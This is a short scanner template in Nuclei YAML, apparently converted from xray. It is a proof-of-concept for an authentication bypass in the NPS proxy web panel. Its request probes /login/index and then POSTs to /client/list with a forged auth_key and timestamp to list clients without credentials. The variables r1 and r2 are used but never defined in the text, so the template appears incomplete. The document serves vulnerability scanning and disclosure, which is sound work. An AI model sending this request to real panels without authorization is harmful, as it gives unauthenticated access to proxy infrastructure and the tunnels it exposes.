id: poc-yaml-nps-auth-bypass

info:
  name: poc-yaml-nps-auth-bypass
  author: iak3ec(https://github.com/nu0l)
  severity: high
  tags: xray-converted,unauth,ct-469727
  reference:
    - https://mp.weixin.qq.com/s/PTq01wcV4XJwutbSjHjfvA

http:
  - raw:
      - |
        GET /login/index HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        POST /client/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search=&order=asc&offset=0&limit=10&auth_key={{r2}}&timestamp={{r1}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200